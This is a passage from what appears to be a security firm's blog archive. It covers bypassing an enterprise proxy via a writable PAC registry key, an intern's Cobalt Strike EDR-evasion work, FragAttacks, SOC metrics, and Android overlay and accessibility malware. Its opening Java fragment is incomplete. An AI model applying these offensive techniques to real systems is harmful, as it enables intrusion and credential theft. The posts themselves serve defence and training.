                System.out.println("Listen :"+e.getMessage());

public static void loadPage(Socket clientSocket, String filePath, BufferedReader br) {
        try {

                PrintWriter output = new PrintWriter(clientSocket.getOutputStream());
                File file = new File(filePath);
                if (!file.exists()) {
                    output.write("HTTP/1.1 404 Not Found\r\n" + "Content-Type: text/html" + "\r\n\r\n");
                        System.out.println("File does not exist.  Client requesting file at : " + filePath);

                else {
                        output.write("HTTP/1.1 200 OK\r\n" + "Content-Type: text/html" + "\r\n\r\n");
                        byte[] fileBytes = Files.readAllBytes(Paths.get(filePath));
                        String fileString = new String(fileBytes, StandardCharsets.UTF_8);

                        System.out.println("Finished writing content to output");


        catch(IOException e) {
                System.out.println("Connection: " + e.getMessage());

With this setup, the system will now retrieve the PAC file to check which system proxy to apply, and it will then proxy the traffic through our Burp.

As a last step for the setup to fully work, we need to put an upstream proxy server in Burp which will forward the traffic to the initial default proxy defined in the original PAC file.

The traffic will now pass through Burp, up to the real enterprise proxy, and we finally can proceed with the actual assessment!


The main enabler allowing us to set up the proxy as we wanted was the registry key handling the PAC file URL being writable without elevated privileges.

To forbid such setup, we recommend ensuring the script address registry key cannot be edited by low-privilege accounts, as it allows to bypass the enterprise proxy settings. Moreover, we recommend delivering the PAC file over HTTPS instead of HTTP, as the latter could be exploited in a Man-in-the-Middle attack, to alter the content of the PAC file without having to change the script address registry key value.

Thomas Grimée
Thomas Grimée

Thomas Grimée is a Senior Security Consultant in the NVISO Software and Security Assessment team. He is managing different penetration testing projects for various customers, and mainly performs web application and red teaming engagements.

Building an ICS Firing Range – Part 1 (Defcon 29 ICS Village)

18 August 2021 at 07:15

An Incident in a Water Treatment Plant

Beginning of this year, the supposed hack of a Water Treatment plant in Florida made some waves. While we often read about news-worthy hacks, this one stuck out due to the apparent simplicity of the compromise and the severe consequences it could have had. So, what had happened?

As so often, a lot of assumptions are made during investigations of the incident which must be taken with a grain of salt. What is confirmed though is the fact that an individual directly connected to an internet-facing operator workstation via TeamViewer. This enabled them to remotely control the system and dramatically increase the levels of sodium hydroxide in the water with severe consequences to the health of the consumers. Luckily, an operator spotted this and could revert any changes. It must also be noted that reportedly other controls existed that could have prevented sodium hydroxide from actually leaking into the drinking water.

Why does this incident not come as a big surprise? More often than not in the world of Operational Technology (OT), you find personnel with a degree in Engineering. They do great work in their field of expertise but might lack the insight into common security topics relevant to Information Technology (IT). After all, their priority is to make things work and keep them running. Therefore, such an engineer might approach problems in a more pragmatic way as opposed to someone who’s spent their fair share in IT and faced the various security issues.

Security Requirements: OT vs IT

The major differences between the two worlds, OT and IT, becomes evident when you look at the specific security requirements. While in Information Technology, confidentiality is paramount in most scenarios before integrity and availability, it is the other way around in OT. If a critical system in a water treatment plant becomes unavailable, things can go down-hill fast.

Availability has higher priority in OT

Needless to say, for a plant operator directly accessing the workstation via TeamViewer is a lot more convenient and efficient than having to jump through hoops of security controls.

While the incident in Florida is not a security flaw in OT infrastructure per se, it has to do with pragmatism contrasting with security awareness.

The incident in Florida is not an isolated case. Be it the incidents of the Ukrainian power grid, ransomware attacks in Hospitals or Transportation around the globe or the sophisticated attack against a power plant in Saudi Arabia, it begs the question: Did nobody test the security controls of the critical infrastructure?

Security Testing in OT

First and foremost, most OT environments are years old and were not designed with security in mind. Any security controls therefore need to be built on top. Therefore, one of the possible answers to the question as to why security controls have not been tested or implemented is: Availability. Implementing a security control will restrict access in some form. To ensure that the control works as intended and cannot easily be circumvented, testing is required. Testing of such security controls is generally an intrusive act and can sometimes be destructive even against IT infrastructure. Let’s not forget, during most security tests, you’d want to provoke an action of a system by supplying data it did not expect, or, in order to find out more about a service are sending possible triggers. If the system cannot properly handle this, it might fault. That is why for critical IT systems you’d want to have any active testing be conducted out of business hours or against a test environment. But this is not feasible to do in a factory or plant that works 24/7.

Naturally, if you decided to conduct a security test of your OT infrastructure anyway, you’d want to hire a team of security professionals who also bag the required awareness and sensitiveness of the OT world. And this is where OT security testing becomes a hen and egg problem.

Training of ICS Security Experts

Fully functioning 3D printed model of a bascule bridge

A lot of those security testers, pentesters and red teamers grew up in the IT world. They have not had the chance to actively test the infrastructure in a steel producing factory or audit segmentation firewalls in a water treatment plant. And let’s be honest, would you want to be the first one to give them the chance?

A solution to all this is to give them the tools and means to acquire the skills and awareness well before they are on the factory floor.

This is where we began our journey of creating a training environment. The primary motivation of our firing range, comprised of virtualized IT infrastructures and real OT components, was to internally train the Red Team on how to safely approach OT level infrastructure. Secondly, it allowed our Blue Team to detect and investigate those attacks. Lastly, having a working OT infrastructure for testing purposes opened up all sorts of possibilities for isolated OT component testing and further research into tooling, vulnerabilities and methodologies.

Our lab is a 120 by 80 cm wide, 3D-printed bascule bridge which is controlled by several Siemens PLCs and HMIs with entire virtualized enterprise and SCADA networks. It is mobile and thus can be easily transported between sites. It is designed to cover different training scenarios, depending on the individual needs.

Recently, we could present out Firing Range at the Defcon 29 ICS Village. Check out the video below.

In this series of blog posts, we’ll discuss our development process of the firing range in more detail, present the rationale behind decisions made and present the challenges we faced along the way.

This series of posts is continued in part 2!

Interview with an NVISO Intern – Writing Custom Beacon Object Files

5 August 2021 at 05:48

During the first months of this year, Sander joined our ‘Software Security & Assessments’ team as an intern and worked on writing Custom Beacon Object Files for the Cobalt Strike C2 framework.

Below you can find out how it all went!

Who are you?

My name is Sander, @cerbersec on twitter. I’m a student information management & cybersecurity at Thomas More and I’ve had the opportunity to do an 8-week internship in NVISO’s Red Team.

How did you discover NVISO?

NVISO co-organizes the Cyber Security Challenge Belgium and there I noticed they had open internship positions for IoT projects. I’ve always been passionate about offensive security and red teaming. Needless to say, I was pleasantly surprised when NVISO offered an internship position in a red team where I’d be working on research for new tooling.

What was it like to be an intern at NVISO?

With the ongoing COVID-19 pandemic, the internship would be fully remote. This meant that meeting colleagues would be slightly more difficult, and the entire internship required a high degree of autonomy. Regardless, I felt very welcome from the start. I had a kick-off meeting with my mentors where I could ask any questions I had and received a nudge in the right direction to get me started.

The overall atmosphere was very pleasant and light-hearted, they encouraged me to ask questions, but also made sure I did my own research first. I learned a lot just from sharing and discussing potentially interesting topics and techniques we came across, not all of them necessarily pertaining to my internship topic. Working with like-minded people really motivated me to push myself.

As my project developed over time, I got the opportunity to present my work during lunch to colleagues from different teams and even from different countries! NVISO regularly organizes Brown Bag sessions during lunch for anybody to attend. During these sessions an NVISO expert presents their insights into a currently hot topic. As an intern, I also got the opportunity to present my own project during lunch. My presentation was met with great feedback and opened up a discussion on the presented techniques, their strengths and possible shortcomings.

On my final day I had a chance to see the office and meet my mentors and colleagues in person. NVISO has a shared open space and after a tour of the office and some quick work, we went for lunch together, which gave me a chance to get to know my mentors in real life and share my experience as an intern. To finish the day, I demoed my project and discussed my findings.

What was your internship project?

When I first met my mentors Jonas and Jean-François, they came up with a variety of topics that would directly contribute to the daily operations of the different red teams. This allowed me to choose topics I’d like to work on which would be in line with my skills, experience, and interests. Little did I know I picked one of the toughest of them all.

I’ve always had a secret love for coding and recently ventured into malware analysis, which turned out to be a great stepping stone towards writing malware. For 8 weeks I would be working on custom process injection techniques and investigate alternative methods to exfiltrate C2 traffic since Domain Fronting is no longer a viable option (at least not “legitimately” via Azure).

My main task consisted of writing custom Beacon Object Files (BOFs) for the Cobalt Strike C2 framework, to perform process injection and bypass Endpoint Detection and Response (EDR) and Anti-Virus (AV) products by using direct syscalls. As my secondary task, I researched different protocols and techniques like DNS over HTTPS (DoH), Domain Borrowing and Software as a Service (SaaS) for exfiltrating C2 traffic.

Working with the Windows Native API was definitely a challenge at first, as there is very limited documentation available, debugging code that is not fully compiled into an executable is a challenge on its own, and use of undocumented functions requires a lot of trial and error to get right. I wrote most of my code in C, which took some time to relearn as I only had limited experience with the language before I started. During development it quickly became apparent that relying on documentation only wasn’t going to get me the results I needed, so I had to break out a debugger and dive into the assembly instructions to figure out where things were going wrong.

As a result, I was able to provide BOFs making use of various injection techniques and ported the recently disclosed Domain Borrowing technique to CobaltStrike (https://github.com/Cerbersec/DomainBorrowingC2).

What is your conclusion?

Overall, I had a great time and got to know some very cool people. I got to explore the highly technical concepts behind malware and at the same time translate this into an easily understandable format so a less technical audience could still understand my work. I’m excited to keep developing these skills and hopefully return for a second internship very soon.

Navigating the impact of Wi-Fi FragAttacks: users, developers and asset owners

30 June 2021 at 13:06

In short: Wi-Fi devices are affected by a series of new attacks on the Wi-Fi protocol, known as FragAttacks and released in May 2021. These attacks have complex requirements and impacts. We attempt to shed some light on those and provide some guidance for users, developers and asset owners (integrators or IT staff).

FragAttacks in a nutshell

FragAttacks are a new collection of vulnerabilities affecting Wi-Fi devices, discovered and released by Mathy Vanhoef in May 2021. In this post, we will not dive into the technical details of the attacks – if you are interested, we highly recommend Mathy’s paper, which is an excellent technical read and does a great job of explaining the nitty-gritty details.

Instead, we will focus on the exploitation requirements and concrete impact of these vulnerabilities, hoping to help users, developers, integrators and IT staff understand them better and take appropriate actions. If you are only interested in the “take home” message and actionable points feel free to skip to the Conclusion and Aftermath sections 🙂

No vulnerability is complete without its own logo (Credit: https://www.fragattacks.com/)

Attack requirements and impacts

Off the top, it is important to understand that FragAttacks are a collection of vulnerabilities that can be divided in two groups:

  1. Design flaws in the 802.11 (Wi-Fi) standard: these affect all Wi-Fi networks, from WEP to WPA3. They can abused using three attacks: frame aggregation (CVE-2020-24586), mixed-key attacks against fragmentation (CVE-2020-24587) and fragment cache poisoning (CVE-2020-24588). They affect most Wi-Fi access points (APs) and client devices (ex. IoT devices, mobile phones, personal computers etc.).
  2. Implementation flaws: these affect specific devices (APs or clients). They include all the rest of the FragAttacks CVEs.

Zooming in on the Wi-Fi design flaws (CVE-2020-24586/7/8)

Let’s first start with the possible impacts: what can happen if an attacker successfully exploits one of these flaws. There are two possibilities: traffic injection and traffic exfiltration.

💉 Traffic injection

The attacker can send traffic to a Wi-Fi connected client or an AP without being connected to the Wi-Fi network (i.e. without knowing the Wi-Fi credentials). Both home and enterprise networks can be affected.

The concrete impact of this depends on the device / AP being targeted:

  • if there are vulnerable network services listening on the target, the attacker could attempt to exploit them. For example, if the target is an alarm system and it can receive commands on a UDP port without authentication, the attacker could send a UDP packet disabling the alarm (see our Hacking Connected Home Alarms post for more on attacking alarm systems).
  • if the target supports IPv6, it is possible to redirect its traffic to a malicious server controlled by the attacker by abusing DNS. The attacker might then be able to intercept and manipulate the rest of the victim’s traffic. This could allow them to retrieve credentials, cookies and other confidential information. However, the impact depends on the security of the protocols used. For example, the attack might not be effective if the victim verifies the identity of the server it connects to (ex. an IoT device using certificate pinning for its backend TLS endpoints will not be affected).
  • if the target is an AP, the injected traffic can also be used to punch holes into its NAT, therefore allowing attackers to remotely target devices connected to the AP – in that case, the impact depends once more on the services listening on the targeted device.

🕳 Traffic exfiltration

The attacker can obtain parts of traffic sent by Wi-Fi clients.

It is important to understand that these traffic fragments will not be encrypted on the Wi-Fi level, but can be encrypted on the application level, depending on the protocol used by the client. For example, if the exfiltrated traffic is HTTPS, the attacker will not be able to read it. Therefore, this impacts mostly traffic using plaintext protocols (HTTP, FTP etc.).

It is also important to point out that the attacker might not be able to control with precision which traffic fragments they will receive.


All three attacks have a series of relatively complex requirements to be successfully exploited. We provide a high-level overview of the main ones in the table below.

Requirement CVE-2020-24586 CVE-2020-24587 CVE-2020-24588
Physical proximity to Wi-Fi network: the attacker must perform an active Man-in-the-Middle attack against the Wi-Fi network, discussed in detail here. In brief, the attacker duplicates the target network using a network card, jams the original network and forces the targeted client to connect to their clone. They then relay messages between the client and the original AP. This allows them to selectively modify Wi-Fi frames. Note that since the attacker does not have Wi-Fi credentials, the payload of the frames remains encrypted.
Trick a client: the attacker must trick a Wi-Fi client in the target Wi-Fi network to connect to a malicious server. This is so that either the client or the server can generate a malicious IP packet, which the Wi-Fi client or the Wi-Fi AP will encrypt and include in a frame. The attacker needs that frame to trigger the attack: they intercept it using their MitM position and alter it accordingly. Without this technique, the flaws cannot be exploited, since the attacker cannot influence the encrypted payload of the Wi-Fi frames directly.

In practice, this can be accomplished through social engineering: for example, sending an email with a malicious link that the victim opens on their computer while they are connected to the Wi-Fi network. Naturally, this is not possible for clients such as IoT devices.
Client sending fragmented frames: for the flaw to be exploited, one of the clients in the Wi-Fi network needs to send fragmented Wi-Fi frames. This is an optimization done by newer devices, so older devices might not allow attackers to trigger the flaw.
Specific AP configuration: the AP must be configured to periodically refresh client session keys. This is generally not the case by default, so this requirement is unlikely to be satisfied in most Wi-Fi networks.
Valid Wi-Fi credentials: this is a special requirement for attacks against Wi-Fi hotspots that enforce client isolation. CVE-2020-24586 can be used to bypass the isolation and exfiltrate traffic from or inject traffic to other clients, but the attacker needs a pair of Wi-Fi credentials to be connected to the hotspot as well.
Overview of main requirements for CVE-2020-24586/7/8

Depending on the attack, some other conditions might also be necessary: for example, for CVE-2020-24586, the target’s cache must not be cleared regularly and frames must be reassembled in a specific way. This means that some systems are not vulnerable (for example, OpenBSD-based APs are not affected by CVE-2020-24586).

Zooming in on the implementation flaws (rest of CVEs)

The rest of FragAttacks’ CVEs are implementation flaws and can be divided in two subgroups.

1) Flaws simplifying the exploitation of the main Wi-Fi flaws (ex. CVE-2020-26146/7)

These relax some of the technical requirements of the three “base” attacks, making them more practical to exploit against specific devices. However, the impacts and main requirements as explained above (physical proximity, social engineering) remain unchanged.

2) Plaintext injection flaws (ex. CVE-2020-26145)

These are the most interesting! Their only requirement for the attacker is physical proximity to the target Wi-Fi network. In other words, they allow easy traffic injection – the alarm example discussed above shows why this could be a critical problem is some scenarios.

The vulnerable alarm systems from our Hacking Connected Home Alarm post are prime targets for traffic injection attacks and could be easily disabled by an attacker at close proximity.


The three “base” attacks (CVE-2020-24586/7/8) affect most Wi-Fi devices, but are unlikely to be abused at scale against regular users.

This is because in practice they require a combination of the attacker being physically present near the Wi-Fi network, social engineering and, in some cases, a specific network configuration. We believe the most likely scenarios of abuse concern high-value targets in spear-phishing scenarios.

Some of the implementation flaws, especially those allowing plaintext injection of frames, allow bypassing the social engineering component and injecting packets in protected networks without other requirements, therefore they are more dangerous in practice. However:

  • they are device-specific, meaning that not all devices are affected;
  • they still require the attacker to be in proximity of the target Wi-Fi network;
  • their impact depends on the security of the target (presence of vulnerable services, hardening measures, use of secure protocols like HTTPS etc.).

Aftermath – what can I do?

We leave you with some actions points for regular users, developers and asset owners.

Regular user:

✔ Keep all your devices (home Wi-Fi access point, personal computer, mobile devices, IoT devices) updated. If you are not sure that a device has an automatic update mechanism, check the vendor website or contact them for more information about how updates are performed.

✔ Use a modern, up-to-date web browser.

✔ Do not ignore browser messages warning you about insecure connections.

✔ Be cautious when following links in e-mails and messages.

✔ Avoid connecting to public Wi-Fi hotspots (open hotspots or hotspots with a shared password, like at a coffeeshop).


✔ Check with the manufacturer of the device you are using (or with the supplier of the Wi-Fi hardware) for guidance on the impact and remediation of FragAttacks on your platform.

✔ Test your platform using the testing tool provided by Mathy.

✔ Properly secure the services exposed or used by your application. For example: use a secure protocol such as TLS, take advantage of mechanisms such as certificate pinning and enforce proper authentication on all listening services. Don’t hesitate to take a look at the OWASP ISVS for more guidance.

Asset owner (device integrator or IT staff) :

✔ Check with product vendors for guidance and patches against FragAttacks.

✔ If you are responsible for IT security, ensure users are properly educated about phishing and social engineering tactics.

✔ If your infrastructure has support for rogue AP monitoring, ensure it is enabled and alerts are acted upon.

If you still have questions or need help navigating the impact of these attacks, don’t hesitate to get in touch!

About the author

Théo Rigas is an IT Security Consultant at NVISO. His main areas of focus are IoT and embedded device security. He regularly performs Web, Mobile and IoT security assessments for NVISO and contributes to NVISO R&D.

Going beyond traditional metrics: 3 key strategies to measuring your SOC performance

26 May 2021 at 11:59

Establishing a Security Operation Center is a great way to reduce the risk of cyber attacks damaging your organization by detecting and investigating suspicious events derived from infrastructure and network data.  In traditionally heavily regulated industries such as banking, the motivation to establish a SOC is often further complimented by a regulatory requirement. It is therefore no wonder that SOCs have been and still are on the rise. As for In-House SOCs, “only 30 percent of organizations had this capability in 2017 and 2018, that number jumps to over half (51%)” (DomainTools).

But as usual, increased security and risk reduction comes at a cost, and a SOC’s price tag can be significant. Adding up to the cost of SIEM tools are in-demand cyber security professionals whose salaries reflect their scarcity on the job market, the cost of setting up and maintaining the systems, developing processes and procedures as well as regular trainings and awareness measures.

It is only fair to expect the return on investment to reflect the large sum of money spent – that is for the SOC to run effectively and efficiently in order to secure further funding. But what does that mean?

I would like to briefly discuss a few key points when it comes to properly evaluate a SOC’s performance and capabilities. I will refrain from proposing a one size fits all-approach, but rather outline which common issues I have encountered and which approach I prefer to avoid them.

I will take into account that – like many security functions – a well-operating SOC can be perceived as a bit of a black box, as it will prevent large-scale security incidents from occurring, making it seem like the company is not at risk and is spending too much on security. Cost and budget are always important factors when it comes to risk management, the right balance between providing clear and understandable numbers and sticking to performance indicators that actually signify performance has to be found.

The limitations of security by numbers and metrics-based KPIs

To demonstrate performance, metrics and key performance indicators (KPI) are often employed. A metric is an atomic data point (e.g. the number of tickets an analyst closed in a day) while a KPI sets an expected or acceptable range for the KPI to fall into (e.g. each analyst is supposed to close from x – x+y tickets in a day).

The below table from the SANS institute’s 2019 SOC survey conveys that the top 3 metrics used to track and report a SOC’s performance are the number of incidents/cases handled, the time from detection to containment to eradication (i.e. the time from detection to full closure) and the number of incidents/cases closed per shift.

Figure 1- SANS, Common and Best Practices for Security Operations Centers: Results of the 2019 SOC Survey

Metrics are popular because they quantify complex matters into one or several simple numbers. As the report states, “It’s easy to count; it’s easy to extract this data in an automated fashion; and it’s an easy way to proclaim, ‘We’re doing something!’ Or, ‚We did more this week than last week!‘“ (SANS Institute). But busy does not equal secure.

There are 3 main issues that can arise when using metrics and KPIs to measure a SOC’s performance:

  • Picking out metrics commonly associated with a high workload or -speed does not ensure that the SOC is actually performing well. This is most apparent with the second-most used metric of the time it takes to fully resolve an incident as this will vary greatly depending on the complexity of the cases. Complex incidents may take months to actually resolve (including a full scoping, containment, communication and lessons learned). Teams should not be punished for being diligent where they should be.
    As a metric, e.g. the number of cases handled or closed are atomic pieces of information without much context and meaning to it. This data point could be made into a KPI by defining a range the metric would need to fall into to be deemed acceptable. This works well if the expected value range can be foreseen and quantified, as in ‘You answered 8 out of 10 questions correctly’. For a SOC there is no fixed number of cases supposed to reliably come up each shift.
  • Furthermore, the number of alerts processed and tickets closed can easily be influenced via the detection rules configuration. While generally the “most prominent challenge for any monitoring system—particularly IDSes—is to achieve a high true positive rate” (MITRE), a KPI based on alert volume creates an incentive to work in an opposite direction. As shown below in Figure 2, more advanced detection capabilities will likely reduce the amount of alerts generated by the SIEM, allowing analysts to spend more time to drill down on remaining key alerts and on complementary threat hunting.
Figure 2 – Mitre, Ten Strategies of a World-Class Cybersecurity Operations Center
  • Lessons learned and the respective improvement of the SOC’s capabilities are rarely rewarded with such metrics, resulting in less incentive to perform these essential activities regularly and diligently.

Especially when KPIs are used to evaluate individual people’s performance and eventually affect bonus or promotion decisions, great care must be taken to not create a conflict of interest between reaching an arbitrary target and actually improving the quality of the SOC. Bad KPIs can result in inefficiencies being rewarded and even increase risk.

Metrics and KPIs certainly have their use, but they must be chosen wisely in order to actually indicate risk reduction via the SOC as well as to avoid conflicting incentives.

Below I will highlight strategies on how to rethink KPIs and SOC performance evaluation.

Operating model-based targets

To understand how to evaluate if the SOC is doing well, it is crucial to focus on the SOCs purpose. To do so, the SOC target operating model is the golden source. A target operating model should be mandatory for each and every SOC, especially at the early stages. It details how the SOC integrates into the organization, why it was established and what it will and will not do. Clearly outlining the purpose of the SOC in the operating model, as well as establishing how the SOC plans to achieve this goal, can help to set realistic and strategically sound measures of performance and success. If you don’t know what goal the SOC is supposed to achieve, how can you measure if it got there?

One benefit of this approach is that it allows for a more holistic view on what constitutes ‘the SOC’, taking into account the maturity of the SOC as well as the people, processes and technology trinity that makes up the SOC.

A target operating model-based approach will work from the moment a SOC is being established. Which data sources are planned to be onboarded (and why)? How will detection capabilities be linked to risk, e.g. via a mapping to MITRE? Do you want to automate your response activities? These are key milestones that provide value to the SOC and reaching them can be used as indicators of performance especially in the first few years of establishing and running the SOC.

Formulating Objectives and Key Results (OKR)

From the target operating model, you can start deriving objectives and key results (OKRs) for the SOC. The idea of OKRs is to define an objective (what should be accomplished) and associate key results with it that have to be achieved to get there. KPIs can fit into this model by serving as key results, but linking them with an objective makes sure that they are meaningful and help to achieve a strategic goal (Panchadsaram).

The objectives chosen can be either project or operations-oriented. A project-oriented objective can refer to a new capability that is to be added to the SOC, e.g. the integration of SOAR capabilities for automation. The key results for this objective are then a set of milestones to complete, e.g. selecting a tool, creating an automation framework and completing a POC.

KPIs are generally well suited when it comes to daily operations. Envisioning the SOC as a service within the organization can help to define performance-oriented baselines to monitor the SOC’s health as well as to steer operational improvements.

  • While the number of cases handled is not a good measure of efficiency on its own, it would be odd if a SOC had not even a single case in a month or two, allowing this metric to act as one component to an overall health and plausibility check. If you usually get 15-25 cases each day and suddenly there is radio silence, you may want to check your systems.
  • The total number of cases handled and the number of cases closed per shift can serve to steer operational efficiency by indicating how many analysts the SOC should employ based on the current case volume.

To implement operational KPIs, metrics can be documented over a period of time to be analyzed at the end of a review cycle – e.g. once per quarter – to decide where the SOC has potential for improvement. This way, realistic targets can be defined tailored to the specific SOC.

Testing the SOC’s capabilities

While metrics and milestones can serve as a conceptional indicator of the SOC’s ability to effectively identify and act on security incidents, it is simply impossible to be sure without seeing the SOC’s capabilities applied in an actual incident. You would need to wait for an actual incident to strike, which is not something you can plan, foresee, or even want to happen. In reality, some SOCs may never face a large incident. This means that they got very lucky  – or that they missed something critical. Which of these is true, they will never know. It is very possible to be compromised without knowing.

Purple teaming is a great exercise to see how the SOC is really doing. Purple teaming refers to an activity where the SOC (the ‘blue team’) and penetration testers (the ‘red team’) work together in order to simulate a realistic attack scenario. The actual execution can vary from a complete surprise test where the red teamers act without instructions – just like a real attacker would – , to more defined approaches where specific attack steps are performed in order to confirm if and when they are being detected.

When you simulate an attack in this way, you know exactly what the SOC should have detected and what it actually found. If there is a gap, the exercise provides good visibility on where to follow up in improving the SOC’s capabilities. Areas of improvement can range from a missing data source in the SIEM to a lack of training and experience for analysts. There is rarely a better opportunity to cover people, processes and technology in one single practical assessment.

It is important that these tests are not being seen as a threat to the SOC, especially if it turns out that the SOC does not detect the red team’s activities. Red teaming may therefore be understood as “a practical response to a complex cultural problem” (DCDC), where an often valuable team-oriented culture revolving around cohesion under stress can “constrain[] thinking, discourage[] people from speaking out or exclude[] alternative perspectives” (DCDC). The whole purpose of the exercise is to identify such blind spots, which – especially when conducted for the first times – can be larger than expected. This may discourage some SOC managers from conducting these tests, fearing that they will make them look bad in front of senior management.

Management should therefore encourage such exercises from an early stage and clearly express what they expect as an outcome: That gaps are closed after a proper assessment, not that no gaps will ever show up. If “done well by the right people using appropriate techniques, red teaming can generate constructive critique of a project, inject broader thinking to a problem and provide alternative perspectives to shape plans” (DCDC).

Conducting such testing early on and on a regular basis – at least once a year – can help improve the SOCs performance as well as steering investments the right way, eventually saving money for the organization. Budget can be used effectively to close gaps and to set priorities instead of blindly adding capabilities such as tools or data sources that end up underused and eventually discarded.


Establishing and running a SOC is a complex and expensive endeavor that should yield more benefit to a company then a couple of checks on compliance checklists. Unfortunately classic SOC metrics are often insufficient to indicate actual risk reduction. Furthermore, metrics can set incentives to work inefficiently and thus waste money and provide a wrong sense of security.

A strategy focused approach on measuring whether the SOC is reaching targets as an organizational unit facilitated by a target operating model complemented by well-defined OKRs and operational KPIs can be of great benefit to lead the SOC to reduce risk more efficiently.

To really know if the SOC is capable of identifying and responding to incidents, regular tests should be conducted in a purple team manner, starting early on and making them a habit as the SOC improves its maturity.

Sarah Wisbar
Sarah Wisbar

Sarah Wisbar is a GCDA and GCFA-certified IT security expert. With several years of experience as a team lead and senior consultant in the financial services sector under her wings, she now manages the NVISO SOC. She likes implementing lean but efficient processes in operations and keeps her eyes on the ever-changing threat landscape to strengthen the SOC’s defenses.


Domaintools : https://www.domaintools.com/content/survey_security_report_card_2019.pdf

SANS Institute: https://www.sans.org/media/analyst-program/common-practices-security-operations-centers-results-2019-soc-survey-39060.pdf

MITRE : https://www.mitre.org/sites/default/files/publications/pr-13-1028-mitre-10-strategies-cyber-ops-center.pdf

DCDC: https://www.act.nato.int/images/stories/events/2011/cde/rr_ukdcdc.pdf

Panchadsaram: https://www.whatmatters.com/resources/difference-between-okr-kpi/

New mobile malware family now also targets Belgian financial apps

11 May 2021 at 15:14

While banking trojans have been around for a very long time now, we have never seen a mobile malware family attack the applications of Belgian financial institutions. Until today…

Earlier this week, the Italy-based Cleafy published an article about a new android malware family which they dubbed TeaBot. The sample we will take a look at doesn’t use a lot of obfuscation and only has a limited set of features. What is interesting though, is that TeaBot actually does attack the mobile applications of Belgian financial institutions.

This is quite surprising since Banking trojans typically use a phishing attack to acquire the credentials of unsuspecting victims. Those credentials would be fairly useless against Belgian financial applications as they all have secure device enrollment and authentication flows which are resilient against a phishing attack.

So let’s take a closer look at how these banking trojans work, how they are actually trying to attack Belgian banking apps and what can be done to protect these apps.


  • Typical banking malware uses a combination of Android accessibility services and overlay windows to construct an elaborate phishing attack
  • Belgian apps are being targeted with basic phishing attacks and keyloggers which should not result in an account takeover

Android Overlay Attacks

There have been numerous articles written on Android Overlay attacks, including a very recent one from F-Secure labs: “How are we doing with Android’s overlay attacks in 2020?” For those who have never heard of it before, let’s start with a small overview.

Drawing on top of other apps through overlays (SYSTEM_ALERT_WINDOW)

The Android OS allows apps to draw on top of other apps after they have obtained the SYSTEM_ALERT_WINDOW permission. There are valid use cases for this, with Facebook Messenger’s chat heads being the typical example. These chat bubbles stay on top of any other application to allow the user to quickly access their conversations without having to go to the Messenger app.

Overlays have two interesting properties: whether or not they are transparent, and whether or not they are interactive. If an overlay is transparent you will be able to see whatever is underneath the overlay (either another app or the home screen), and if an overlay is interactive it will register any screen touches, while the app underneath will not. Below you can see two examples of this. On the left, there’s Facebook’s Messenger app, which has may interactive views, but also some transparent parts at the top, while on the right you see Twilight, which is a blue light filter that covers the entire screen in a semi-transparent way without any interactive elements in the overlay. The controls that you do see with Twilight is the actual Twilight app that’s opened underneath the red overlay.

Until very recently, if the app was installed through the Google Play store (instead of through sideloading or third party app stores), the application automatically received this permission, without even a confirmation dialog for the user! After much abuse by Banking malware that was installed through the Play store, Google has now added an additional manual verification step in the approval process for apps on the Google Play store. If the app wants to have the permission without requesting it from the user, the app will need to request special permission from Google. But of course, an app can still manually request this permission from the user, and Android’s information for this permission looks rather innocent: “This may interfere with your use of other apps”.

The permission is fairly benign in the hands of the Facebook Messenger app or Twilight, but for mobile malware, the ability to draw on top of other apps is extremely interesting. There are a few ways in which you can use this to attack the user:

  1. Create a fake UI on top of a real app that tricks the user into touching specific locations on the screen. Those locations will not be interactive, and will thus propagate the touch to the underlying application. As a result, the user performs actions in the underlying app without realizing it. This is often called Tapjacking.
  2. Create interactive fields on top of key fields of the app in order to harvest information such as usernames and passwords. This would require the overlay to track what is being shown in the app, so that it can correctly align its own buttons text fields. All in all quite some work and not often used to attack the user.
  3. Instead of only overlaying specific buttons, the overlay covers the entire app and pretends to be the app. A fully functional app (usually a webview) is shown on top of the targeted app and asks the user for their credentials. This is a full overlay attack.

These are just three possibilities, but there are many more. Researchers from Georgia Tech and the UC Santa Barbara have documented different attacks in their paper which also introduces the Cloak and Dagger attacks explained below.

Before we get into Cloak and Dagger, let’s take a look at a few other dangerous Android permissions first.

Accessibility services

Applications on Android can request the accessibility services permission, which allows them to simulate button presses or interact with UI elements outside of their own application. These apps are very useful to people with disabilities who need a bit of extra help to navigate their smartphone. For example, the Google TalkBack application will read out any UI element that is touched on the screen, and requires a double click to actually register as a button press. An alternative application is the Voice Access app which tags every UI element with a number and allows you to select them by using voice commands.

Left: Giving permission to the TalkBack service. Android clearly indicates the dangers of giving this permission
Middle: TalkBack uses text-to-speech to read the description that the user taps
Right: Voice Access adds a button to each UI control and allows you to click them through voice commands

Both of these applications can read UI elements and perform touches on the user’s behalf. Just like overlay windows, this can be a very nice feature, or very dangerous if abused. Malware could use accessibility services to create a keylogger which collects the input of a text field any time data is entered, or it could press buttons on your behalf to purchase premium features or subscriptions, or even just click advertisements.

So let’s take a quick look at what kind of information becomes available by installing the Screen Logger app. The Screen Logger app is a legitimate application that uses accessibility features to monitor your actions. At the time of writing, the application doesn’t even request INTERNET permission, so it shouldn’t be stealing your data in any way. However, it’s always best to do these tests on a device without sensitive data which you can factory-reset. The application is very basic:

  • Install the accessibility service
  • Click the record button
  • Perform some actions and enter some text
  • Click the stop recording button

The app will then show all the information it has collected. Below are some examples of the information it collected from a test app:

The Screen logger application shows the data that was collected through an accessibility service

When enabling accessibility services, users are actually warned about the dangers of enabling accessibility. This makes it a bit harder to trick the user into granting this permission. More difficult, but definitely not impossible. Applications actually have a lot of control over the information that is shown to the user. Take for example the four screens below, which belong to a malware sample. All of the text indicated with red is under control of the attacker. The first screen shows a popup window asking the user to enable the Google service (which is, of course, the name of the malware’s service), and the next three screens are what the user sees while enabling the accessibility permission.

Tricking users into installing an accessibility service

Even if malware can’t convince the user to give the accessibility permission, there’s still a way to trick them using overlay windows. This approach is exactly what Cloak and Dagger does.

Cloak and Dagger

Cloak and Dagger is best explained through their own video, where they show a combination of overlay attacks and accessibility to install an application that has all permissions enabled. In the video shown below, anything that is red is non-transparent and interactive, while everything that is green or transparent is non-interactive and will let touches go through to the app underneath.

Now, over the past few years, Android has made efforts to hinder these kinds of attacks. For example, on newer versions of Android, it’s not possible to configure accessibility settings in case an overlay is active, or Android automatically disables any overlays when going into the Accessibility settings page. Unfortunately this only prevents a malware sample from giving itself accessibility permissions through overlays; it still allows malware to use social engineering tactics to trick users into installing them.

Read SMS permission

